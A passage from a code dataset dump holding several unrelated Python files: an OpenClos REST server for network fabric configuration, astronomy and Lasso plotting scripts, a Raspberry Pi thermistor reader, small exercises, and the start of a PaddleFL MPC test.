device.configStatus\n outputDict['configStatusReason'] = device.configStatusReason\n outputDict['l2Status'] = device.l2Status\n outputDict['l2StatusReason'] = device.l2StatusReason\n outputDict['l3Status'] = device.l3Status\n outputDict['l3StatusReason'] = device.l3StatusReason\n outputDict['serialNumber'] = device.serialNumber\n outputDict['deployStatus'] = device.deployStatus\n outputDict['uri'] = bottle.request.url\n 
outputDict['pod'] = {'uri': ipFbaricUri }\n outputDict['config'] = {'uri': bottle.request.url + '/config' }\n \n return {'device': outputDict}\n else:\n raise bottle.HTTPError(404, \"device with id: %s not found\" % (deviceId)) \n \n \n def getDeviceConfig(self, dbSession, ipFabricId, deviceId):\n \n device = self.isDeviceExists(dbSession, ipFabricId, deviceId)\n if device is None:\n raise bottle.HTTPError(404, \"No device found with ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n\n config = device.config\n if config is None:\n raise bottle.HTTPError(404, \"Device exists but no config found, probably fabric script is not ran. ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n \n bottle.response.headers['Content-Type'] = 'application/json'\n return config.config\n\n \n def getZtpConfig(self, dbSession, ipFabricId):\n \n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n logger.debug('Fabric name: %s' % (ipFabric.name))\n \n ipFabricFolder = ipFabric.id + '-' + ipFabric.name\n fileName = os.path.join(ipFabricFolder, \"dhcpd.conf\")\n logger.debug('webServerRoot: %s, fileName: %s, exists: %s' % (webServerRoot, fileName, os.path.exists(os.path.join(webServerRoot, fileName)))) \n ztpConf = bottle.static_file(fileName, root=webServerRoot)\n if isinstance(ztpConf, bottle.HTTPError):\n raise bottle.HTTPError(404, \"Pod exists but no ztp Config found. Pod name: '%s \" % (ipFabric.name))\n return ztpConf\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n\n def isDeviceExists(self, dbSession, ipFabricId, deviceId):\n try:\n device = dbSession.query(Device).join(Pod).filter(Device.id == deviceId).filter(Pod.id == ipFabricId).one()\n return device\n except (exc.NoResultFound):\n raise bottle.HTTPError(404, \"No device found with ipFabricId: '%s', deviceId: '%s'\" % (ipFabricId, deviceId))\n\n def getJunosImage(self, dbSession, junosImageName):\n \n fileName = os.path.join(junosImageRoot, junosImageName)\n logger.debug('junosImageRoot: %s, image: %s, exists: %s' % (junosImageRoot, junosImageName, os.path.exists(fileName)))\n\n config = bottle.static_file(junosImageName, root=junosImageRoot)\n if isinstance(config, bottle.HTTPError):\n raise bottle.HTTPError(404, \"Junos image file not found. 
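isDeviceExists above maps Query.one()'s NoResultFound onto a 404; the same lookup reads a little flatter with one_or_none() (available since SQLAlchemy 1.0.9). A sketch reusing the dump's Device/Pod models, otherwise illustrative:

def find_device(dbSession, fabric_id, device_id):
    # Returns the Device row, or None instead of raising NoResultFound.
    return (dbSession.query(Device)
            .join(Pod)
            .filter(Device.id == device_id, Pod.id == fabric_id)
            .one_or_none())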
name: '%s'\" % (junosImageName))\n return config\n \n def getOpenClosConfigParams(self, dbSession):\n supportedDevices = []\n for device in self.__conf['deviceFamily']:\n port = util.getPortNamesForDeviceFamily(device, self.__conf['deviceFamily'])\n deviceDetail = {}\n if len(port['uplinkPorts']) > 0:\n deviceDetail['family'] = device\n deviceDetail['uplinkStart'] = port['uplinkPorts'][0]\n deviceDetail['uplinkEnd'] = port['uplinkPorts'][len(port['uplinkPorts'])-1]\n deviceDetail['role'] = 'leaf'\n \n if len(port['downlinkPorts']) > 0:\n deviceDetail['downlinkStart'] = port['uplinkPorts'][0]\n deviceDetail['downlinkEnd'] = port['uplinkPorts'][len(port['uplinkPorts'])-1]\n deviceDetail['role'] = 'leaf'\n \n if len(port['uplinkPorts'])==0 and len(port['downlinkPorts']) == 0:\n if device == 'qfx5100-24q-2p':\n deviceDetail['role'] = 'spine'\n deviceDetail['family'] = device\n deviceDetail['downlinkStart'] = port['ports'][0]\n deviceDetail['downlinkEnd'] = port['ports'][len(port['ports'])-1]\n deviceDetail['uplinkStart'] = ''\n deviceDetail['uplinkEnd'] = ''\n \n supportedDevices.append(deviceDetail)\n \n confValues = {}\n confValues.update({'dbUrl': self.__conf['dbUrl']})\n confValues.update({'supportedDevices' : supportedDevices })\n confValues.update({'dotColors': self.__conf['DOT']['colors'] })\n confValues.update({'httpServer' : self.__conf['httpServer']})\n confValues.update({'snmpTrap' : self.__conf['snmpTrap']})\n\n return {'OpenClosConf' : confValues }\n \n def createIpFabric(self, dbSession): \n if bottle.request.json is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"No json in request object\"))\n else:\n pod = bottle.request.json.get('ipFabric')\n if pod is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"POST body can not be empty\"))\n\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n ipFabric = self.getPodFromDict(pod)\n ipFabricName = ipFabric.pop('name')\n fabricDevices = self.getDevDictFromDict(pod)\n try:\n fabric = l3ClosMediation.createPod(ipFabricName, ipFabric, fabricDevices)\n url = bottle.request.url + '/' + fabric.id\n ipFabric = self.getIpFabric(dbSession, fabric.id, url)\n except ValueError as e:\n logger.debug('StackTrace: %s' % (traceback.format_exc()))\n raise bottle.HTTPError(400, exception = RestError(0, e.message))\n bottle.response.set_header('Location', url)\n bottle.response.status = 201\n\n return ipFabric\n \n def createCablingPlan(self, dbSession, ipFabricId):\n try:\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n if l3ClosMediation.createCablingPlan(ipFabricId) is True:\n return bottle.HTTPResponse(status=200)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n\n def createDeviceConfiguration(self, dbSession, ipFabricId):\n try:\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n if l3ClosMediation.createDeviceConfig(ipFabricId) is True:\n return bottle.HTTPResponse(status=200)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n \n def createZtpConfiguration(self, dbSession, ipFabricId):\n try:\n ZtpServer.createPodSpecificDhcpConfFile(self, ipFabricId)\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id[%s] not found\" % (ipFabricId))\n\n def reconfigIpFabric(self, dbSession, ipFabricId):\n if bottle.request.json is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"No json in request object\"))\n else:\n inPod = 
bottle.request.json.get('ipFabric')\n if inPod is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"POST body can not be empty\"))\n\n l3ClosMediation = L3ClosMediation(self.__conf, self.__daoClass)\n ipFabric = self.getPodFromDict(inPod)\n #ipFabric['id'] = ipFabricId\n #ipFabric['uri'] = bottle.request.url\n fabricDevices = self.getDevDictFromDict(inPod)\n # Pass the ipFabric and fabricDevices dictionaries to config/update API, then return\n try:\n updatedFabric = l3ClosMediation.updatePod(ipFabricId, ipFabric, fabricDevices)\n url = bottle.request.url + '/' + updatedFabric.id\n return self.getIpFabric(dbSession, ipFabricId, url)\n except ValueError as e:\n raise bottle.HTTPError(400, exception = RestError(0, e.message))\n \n def setOpenClosConfigParams(self):\n return bottle.HTTPResponse(status=200)\n \n def deleteIpFabric(self, dbSession, ipFabricId):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n self.__dao.deleteObject(dbSession, ipFabric)\n util.deleteOutFolder(self.__conf, ipFabric)\n logger.debug(\"IpFabric with id: %s deleted\" % (ipFabricId))\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n return bottle.HTTPResponse(status=204)\n\n def getPodFromDict(self, podDict):\n ipFabric = {}\n '''\n # Need to revisit later on to make thing works as below.\n podDict.pop('devices')\n ipFabric = Pod(**inPod)\n '''\n if podDict is None:\n raise bottle.HTTPError(400, exception = RestError(0, \"Invalid value in POST/PUT body.\"))\n ipFabric['name'] = podDict.get('name')\n ipFabric['fabricDeviceType'] = podDict.get('fabricDeviceType')\n ipFabric['fabricDeviceCount'] = podDict.get('fabricDeviceCount')\n ipFabric['spineCount'] = podDict.get('spineCount')\n ipFabric['spineDeviceType'] = podDict.get('spineDeviceType')\n ipFabric['leafCount'] = podDict.get('leafCount')\n ipFabric['leafSettings'] = podDict.get('leafSettings')\n ipFabric['leafUplinkcountMustBeUp'] = podDict.get('leafUplinkcountMustBeUp')\n ipFabric['interConnectPrefix'] = podDict.get('interConnectPrefix')\n ipFabric['vlanPrefix'] = podDict.get('vlanPrefix')\n ipFabric['loopbackPrefix'] = podDict.get('loopbackPrefix')\n ipFabric['spineAS'] = podDict.get('spineAS')\n ipFabric['leafAS'] = podDict.get('leafAS')\n ipFabric['topologyType'] = podDict.get('topologyType')\n ipFabric['outOfBandAddressList'] = podDict.get('outOfBandAddressList')\n ipFabric['outOfBandGateway'] = podDict.get('outOfBandGateway')\n ipFabric['managementPrefix'] = podDict.get('managementPrefix')\n ipFabric['hostOrVmCountPerLeaf'] = podDict.get('hostOrVmCountPerLeaf')\n ipFabric['description'] = podDict.get('description')\n ipFabric['devicePassword'] = podDict.get('devicePassword')\n\n return ipFabric\n\n\n def getDevDictFromDict(self, podDict):\n if podDict is not None:\n devices = podDict.get('devices')\n else:\n raise bottle.HTTPError(400, exception = RestError(0, \"Invalid value in POST body.\"))\n\n fabricDevices = {}\n spines = []\n leaves = []\n for device in devices:\n temp = {}\n temp['name'] = device.get('name')\n temp['macAddress'] = device.get('macAddress')\n temp['role'] = device.get('role')\n temp['username'] = device.get('username')\n temp['password'] = device.get('password')\n temp['family'] = device.get('family')\n temp['serialNumber'] = device.get('serialNumber')\n temp['deployStatus'] = device.get('deployStatus')\n if temp['role'] == 'spine':\n spines.append(temp)\n elif temp['role'] == 'leaf':\n leaves.append(temp)\n else:\n raise bottle.HTTPError(400, 
exception = RestError(0, \"Unexpected role value in device inventory list\"))\n fabricDevices['spines'] = spines\n fabricDevices['leafs'] = leaves\n\n return fabricDevices\n\n def getL2Report(self, dbSession, ipFabricId):\n try:\n cached = bottle.request.query.get('cached', '1')\n if cached == '1':\n cachedData = True\n else:\n cachedData = False\n bottle.response.headers['Content-Type'] = 'application/json'\n return self.l2Report.generateReport(ipFabricId, cachedData)\n\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id: %s not found\" % (ipFabricId))\n \n def getL3Report(self, dbSession, ipFabricId):\n try:\n cached = bottle.request.query.get('cached', '1')\n if cached == '1':\n cachedData = True\n else:\n cachedData = False\n bottle.response.headers['Content-Type'] = 'application/json'\n return self.l3Report.generateReport(ipFabricId, cachedData)\n\n except ValueError:\n raise bottle.HTTPError(404, \"Fabric with id: %s not found\" % (ipFabricId))\n\ndef main():\n restServer = RestServer()\n restServer.initRest()\n restServer.start()\n \nif __name__ == '__main__':\n main()","sub_path":"jnpr/openclos/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":31493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"68149015","text":"import os\nimport numpy as np\nimport fsps\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom astropy.io import ascii\n\nsp = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.0)\nsp_dust = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.4)\nsp_must = fsps.StellarPopulation(compute_vega_mags=False, zcontinuous=1,\n sfh=0, logzsol=0.0, dust_type=2, dust2=0.8)\n\nbands = np.array(['wfc3_uvis_f475w','wfc3_uvis_f814w','wfc3_ir_f160w'])\n\nphottable = 'Photometry/coarse_final/atest.txt'\ncatalog = ascii.read(phottable)\n \nfilename = 'fsps_example.pdf'\n\nwith PdfPages(filename) as pdf:\n fig = plt.figure()\n\n t = np.array([0.004,0.006,0.007,0.01,0.02,0.04,0.06,0.08,0.1,0.2,0.4])\n colors = ['violet', 'indigo', 'blue', 'green', 'cyan', 'orange', 'red', 'darkviolet', 'midnightblue', 'darkgoldenrod', 'chocolate']\n for i in range(0,len(t)):\n wave, spec = sp.get_spectrum(tage=t[i])\n plt.plot(wave,spec,color=colors[i], label=str(int(t[i]*1e3))+' Myr')\n\n plt.xlim(3000,10000)\n plt.ylim(1e-15,1e-13)\n plt.xscale(\"log\", nonposx='clip')\n plt.yscale(\"log\", nonposy='clip')\n plt.xlabel('Wavelength [Angstroms]')\n plt.ylabel('Luminosity')\n plt.legend(loc='lower right', prop={'size': 10}, framealpha=0.1)\n pdf.savefig()\n plt.close()\n\n for j in range(0,len(catalog)):\n\n mags = np.zeros([len(t),len(bands)])\n mags_dust = np.zeros([len(t),len(bands)])\n mags_must = np.zeros([len(t),len(bands)])\n for i in range(0,len(mags)):\n mags[i] = sp.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n mags_dust[i] = sp_dust.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n mags_must[i] = sp_must.get_mags(tage=t[i], bands=bands, redshift=catalog['z'][j])\n fig = plt.figure()\n\n m814 = -2.5*np.log10(catalog['f_814'][j]*1e-9)\n mass = 10**((m814 - mags[:,1])/(-2.5))\n mass_dust = 10**((m814 - mags_dust[:,1])/(-2.5))\n mass_must = 10**((m814 - mags_must[:,1])/(-2.5))\n \n plt.scatter(mags[:,1]-mags[:,2], mags[:,0]-mags[:,1], color='blue', marker='o', label='no dust')\n for i in range(0,len(mags)):\n plt.text(mags[i,1]-mags[i,2], 
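The mass estimate in the fsps record above inverts the astronomical magnitude definition m = -2.5 log10(flux) + const, so a 2.5 mag difference corresponds to exactly a factor of ten in flux, and hence in the inferred mass. A quick numeric check with made-up magnitudes:

# An observed magnitude 2.5 mag brighter than the model implies 10x the mass.
m814, model_mag = 20.0, 22.5
mass_ratio = 10 ** ((m814 - model_mag) / -2.5)
print(mass_ratio)  # 10.0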
mags[i,0]-mags[i,1],str(int(t[i]*1e3)))\n plt.scatter(mags_dust[:,1]-mags_dust[:,2], mags_dust[:,0]-mags_dust[:,1], color='green', marker='v', label='0.4 mag')\n for i in range(0, len(mags_dust)):\n plt.text(mags_dust[i,1]-mags_dust[i,2], mags_dust[i,0]-mags_dust[i,1],str(int(t[i]*1e3)))\n plt.scatter(mags_must[:,1]-mags_must[:,2], mags_must[:,0]-mags_must[:,1], color='red', marker='s', label='0.8 mag')\n for i in range(0, len(mags_must)):\n plt.text(mags_must[i,1]-mags_must[i,2], mags_must[i,0]-mags_must[i,1],str(int(t[i]*1e3)))\n plt.scatter(-2.5*np.log10(catalog['f_814'][j]*1e-9) - -2.5*np.log10(catalog['f_1600'][j]*1e-9), -2.5*np.log10(catalog['f_475'][j]*1e-9) - -2.5*np.log10(catalog['f_814'][j]*1e-9), color='magenta', marker='*', s=500)\n plt.xlabel('[F814W] - [F160W]')\n plt.ylabel('[F475W] - [F814W]')\n plt.xlim([-0.4,1.4])\n plt.ylim([-0.4,1.4])\n plt.title(catalog['ID'][j])\n plt.legend(loc='lower right', prop={'size': 10})\n pdf.savefig()\n plt.close()\n\n fig = plt.figure()\n plt.scatter(mass,t*1e3,color='blue', marker='o', label='no dust')\n plt.scatter(mass_dust,t*1e3,color='green', marker='v', label='0.4 mag')\n plt.scatter(mass_must,t*1e3,color='red', marker='s', label='0.8 mag')\n plt.xlabel('SSP Stellar Mass')\n plt.ylabel('SSP Age [Myr]')\n plt.title(catalog['ID'][j])\n plt.ylim([0,120])\n plt.xlim([1e9,1e11])\n plt.xscale(\"log\", nonposx='clip')\n plt.legend(loc='upper left', prop={'size': 10})\n pdf.savefig()\n plt.close()\n \nos.system('open %s &' % filename)\n","sub_path":"hst/PROSPECTOR/fsps_example.py","file_name":"fsps_example.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"244349877","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn import linear_model, preprocessing\nimport seaborn as sns\n\n#Dataは\"https://web.stanford.edu/~hastie/StatLearnSparsity_files/DATA/crime.html\"\n\ncrime = pd.read_table(\".\\\\Datasets\\\\crime_def.txt\", header=None)\nY = crime.iloc[:, 0]\nX = crime.iloc[:, 2:7]\nsc = preprocessing.StandardScaler()\nX = sc.fit_transform(X) #標準化\nY = Y - Y.mean() #中心化\nZ = pd.DataFrame(X, columns=[\"X1\", \"X2\", \"X3\", \"X4\", \"X5\"])\n\nlasso20 = linear_model.Lasso(alpha=20.0)\nlasso20.fit(X, Y)\n\nprint(lasso20.coef_)\nprint(lasso20.score(X, Y))\n\n\nalpha = np.arange(0.1, 200, 0.1)\n\ncoefs = np.zeros((len(alpha), 5))\n\nfor i, data in enumerate(alpha):\n lasso = linear_model.Lasso(alpha=float(data))\n lasso.fit(X, Y)\n coefs[i] = lasso.coef_ \n\n\nplt.figure(figsize=(12, 24))\n\n#特徴量同士の相関\nplt.subplot(1, 2, 1)\ncolormap = plt.cm.viridis\nplt.title(\"Crime Correlation of Features\")\nsns.heatmap(Z.astype(float).corr(), linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)\n\n#解パス図\n#lasso_pathでも代用可能\nplt.subplot(1, 2, 2)\nfor i in np.arange(0, 5, 1):\n plt.plot(np.log(alpha), coefs[:, int(i)], label=\"X{0}\".format(str(i+1)))\n plt.scatter(np.log(20), lasso20.coef_[int(i)], marker='+')\n\nplt.legend()\nplt.xlabel(\"log(alpha)\")\nplt.ylabel(\"coefficients\")\n\nplt.show()\n","sub_path":"Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"82202696","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----湖南创乐博智能科技有限公司----\n# 文件名:17_thermistor.py\n# 版本:V2.0\n# author: zhulin\n# 
Description: analog temperature sensor experiment\r\n#####################################################\r\nimport PCF8591 as ADC\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport math\r\n\r\nmakerobo_DO = 17 # temperature sensor DO pin\r\nGPIO.setmode(GPIO.BCM) # pin numbering: use the BCM scheme\r\n\r\n# initial setup\r\ndef makerobo_setup():\r\n\tADC.setup(0x48) # set the PCF8591 module address\r\n\tGPIO.setup(makerobo_DO, GPIO.IN) # set the temperature sensor DO port to input mode\r\n\r\n# print the temperature sensor status message\r\ndef makerobo_Print(x):\r\n\tif x == 1: # just right\r\n\t\tprint ('')\r\n\t\tprint ('***********')\r\n\t\tprint ('* Better~ *')\r\n\t\tprint ('***********')\r\n\t\tprint ('')\r\n\tif x == 0: # too hot\r\n\t\tprint ('')\r\n\t\tprint ('************')\r\n\t\tprint ('* Too Hot! *')\r\n\t\tprint ('************')\r\n\t\tprint ('')\r\n\r\n# loop function\r\ndef makerobo_loop():\r\n\tmakerobo_status = 1 # status value\r\n\tmakerobo_tmp = 1 # current value\r\n\twhile True:\r\n\t\tmakerobo_analogVal = ADC.read(0) # read the analog value on AIN0\r\n\t\tmakerobo_Vr = 5 * float(makerobo_analogVal) / 255 # convert to the 5V range\r\n\t\tmakerobo_Rt = 10000 * makerobo_Vr / (5 - makerobo_Vr)\r\n\t\tmakerobo_temp = 1/(((math.log(makerobo_Rt / 10000)) / 3950) + (1 / (273.15+25)))\r\n\t\tmakerobo_temp = makerobo_temp - 273.15\r\n\t\tprint ('temperature = ', makerobo_temp, 'C')\r\n\t\t\r\n\t\tmakerobo_tmp = GPIO.input(makerobo_DO) # read the temperature sensor digital port\r\n\r\n\t\tif makerobo_tmp != makerobo_status: # check whether the status value has changed\r\n\t\t\tmakerobo_Print(makerobo_tmp) # print the temperature sensor status message\r\n\t\t\tmakerobo_status = makerobo_tmp # set the current value as the comparison value, to avoid repeated printing; \r\n\r\n\t\ttime.sleep(0.2) # delay 200ms\r\n\r\n# program entry point\r\nif __name__ == '__main__':\r\n\ttry:\r\n\t\tmakerobo_setup() # initialization\r\n\t\tmakerobo_loop() # loop function\r\n\texcept KeyboardInterrupt: \r\n\t\tpass\t\r\n","sub_path":"examples/17_thermistor/python/17_thermistor.py","file_name":"17_thermistor.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254235400","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n#HINT 1: https://www.google.com/search?q=how+to+round+number+to+2+decimal+places+python&oq=how+to+round+number+to+2+decimal\n#HINT 2: https://www.kite.com/python/answers/how-to-limit-a-float-to-two-decimal-places-in-python\nprint('Welcome to the Tip calculator')\nTotal_amt = input(\"Enter total bill amount?\")\nTip_percentage = input(\"Enter what percentage tip would you like to give? 
10, 12 or 15?\")\nnew_tip = float(Tip_percentage)\nnew_total = float(Total_amt)\nnew_total_incl_tip = new_total*(1 + (new_tip/100))\npeople = float(input(\"How many ppl to split?\"))\ntotal_pp = round(new_total_incl_tip/people, 2)\nprint(f\"Each person should pay ${total_pp}\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"543621100","text":"import math\r\nimport time\r\n\r\n\r\ndef prime_validation(x):\r\n if x <= 1:\r\n return False\r\n if x == 2:\r\n return True\r\n if x > 2 and x % 2 == 0:\r\n return False\r\n\r\n max_div = math.floor(math.sqrt(x))\r\n for i in range(3, 1 + max_div, 2):\r\n if x % i == 0:\r\n return False\r\n return True\r\n\r\n\r\ndef largest_prime_factor(n):\r\n prime_factor = 1\r\n i = 2\r\n while i <= n / i:\r\n if n % i == 0:\r\n prime_factor = i\r\n n /= i\r\n else:\r\n i += 1\r\n if prime_factor < n:\r\n prime_factor = n\r\n return int(prime_factor)\r\n\r\n\r\nstart_time = time.time()\r\nprime_count = 0\r\nnumber_count = 2\r\nprime_sum = 0\r\nfirst_prime = 100003\r\nwhile prime_count != first_prime:\r\n is_prime = prime_validation(number_count)\r\n if is_prime:\r\n prime_count += is_prime\r\n prime_sum += number_count\r\n number_count += 1\r\nprint(f\"Sum of first {first_prime} prime numbers:\", prime_sum)\r\nnew_value_1 = str(prime_sum)[-3:]\r\nprint(\"Three Right most digits:\", new_value_1)\r\nfinal_value = largest_prime_factor(int(new_value_1))\r\nprint(f\"largest Prime Factor of {new_value_1}:\", final_value)\r\nend_time = time.time()\r\nprint(\"Time required :\", end_time - start_time)\r\nprint(\"*\"*25)\r\nprint(f\"{final_value}@vectis.ai\")\r\nprint(\"*\"*25)","sub_path":"Vectis_task.py","file_name":"Vectis_task.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529527486","text":"# Copyright (c) 2021 PaddlePaddle Authors. 
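A quick sanity check for the trial-division largest_prime_factor defined above; the 600851475143 case is the classic Project Euler value:

assert largest_prime_factor(13195) == 29           # 13195 = 5 * 7 * 13 * 29
assert largest_prime_factor(600851475143) == 6857
assert largest_prime_factor(97) == 97              # a prime is its own largest factor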
All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\nimport unittest\r\nfrom multiprocessing import Manager\r\nimport numpy as np\r\nimport paddle.fluid as fluid\r\nimport paddle_fl.mpc as pfl_mpc\r\nimport test_op_base\r\nfrom paddle_fl.mpc.data_utils.data_utils import get_datautils\r\n\r\naby3 = get_datautils('aby3')\r\n\r\nclass Solution(test_op_base.TestOpBase):\r\n def findMedianSortedArrays(self, **kwargs):\r\n def getKthElement(k):\r\n num = 3\r\n index1, index2, index3 = 0, 0, 0\r\n op_sub = pfl_mpc.layers.elementwise_sub(x=x, y=y)\r\n op_gt = pfl_mpc.layers.greater_than(x=x, y=zero)\r\n while True:\r\n if (index1 == d_1_length and index2 == d_2_length):\r\n return d_3[:,index3 + k - 1:index3 + k],index1, index2, index3 + k,2,index3 + k\r\n if (index2 == d_2_length and index3 == d_3_length):\r\n return d_1[:,index1 + k - 1:index1 + k],index1 + k , index2, index3,0,index1 + k\r\n if (index1 == d_1_length and index3 == d_3_length):\r\n return d_2[:,index2 + k - 1:index2 + k],index1, index2 + k, index3,1,index2 + k\r\n if index1 == d_1_length:\r\n num = num - 1\r\n if index2 == d_2_length:\r\n num = num - 1\r\n if index3 == d_3_length:\r\n num = num - 1\r\n if k == 1:\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, index2:index2+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1],index1, index2, index3 + 1,2,index3 + 1\r\n else:\r\n return d_2[:,index2:index2+1],index1, index2 + 1, index3,1,index2 + 1\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, index1:index1+1], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1],index1, index2, index3 + 1,2,index3 + 1\r\n else:\r\n return d_1[:,index1:index1+1],index1 + 1, index2, index3,0,index1 + 1\r\n if k == 2:\r\n newIndex1 = min(index1, d_1_length - 1)\r\n newIndex2 = min(index2, d_2_length - 1)\r\n newIndex3 = min(index3, d_3_length - 1)\r\n else:\r\n newIndex1 = min(index1 + k // num - 1, d_1_length - 1)\r\n newIndex2 = min(index2 + k // num - 1, d_2_length - 1)\r\n newIndex3 = min(index3 + k // num - 1, d_3_length - 1)\r\n d_tmp = exe.run(feed={'x': d_1[:,newIndex1:newIndex1+1], 'y': d_2[:,newIndex2:newIndex2+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y': d_2[:,newIndex2:newIndex2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n d_tmp = exe.run(feed={'x': d_2[:, newIndex2:newIndex2+1], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': 
d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n k -= newIndex3 - index3 + 1\r\n index3 = newIndex3 + 1\r\n else:\r\n k -= newIndex2 - index2 + 1\r\n index2 = newIndex2 + 1\r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:, newIndex1:newIndex1+1], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0], 'y': d_3[:, newIndex3:newIndex3+1], 'zero': d_zero},fetch_list=[op_gt])\r\n if results[0] == 1:\r\n k -= newIndex3 - index3 + 1\r\n index3 = newIndex3 + 1\r\n else:\r\n k -= newIndex1 - index1 + 1\r\n index1 = newIndex1 + 1\r\n\r\n def getNextElement(index1,index2,index3,num):\r\n op_sub = pfl_mpc.layers.elementwise_sub(x=x, y=y)\r\n op_gt = pfl_mpc.layers.greater_than(x=x, y=zero)\r\n if(num == 0 and index1 == d_1_length):\r\n d_tmp = exe.run(feed={'x': d_2[:,index2:index2+1], 'y': d_3[:,index3:index3+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_3[:,index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_2[:,index2:index2+1] \r\n if(num == 1 and index2 == d_2_length):\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_3[:,index3:index3+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_3[:,index3:index3+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_3[:,index3:index3+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n if(num == 2 and index3 == d_3_length):\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, fetch_list=[op_sub])\r\n results = exe.run(feed={'x': d_tmp[0],'y':d_2[:,index2:index2+1], 'zero': d_zero}, fetch_list=[op_gt])\r\n if results[0] == 1:\r\n return d_2[:,index2:index2+1]\r\n else:\r\n return d_1[:,index1:index1+1] \r\n else:\r\n d_tmp = exe.run(feed={'x': d_1[:,index1:index1+1], 'y': d_2[:,index2:index2+1],'zero': d_zero}, 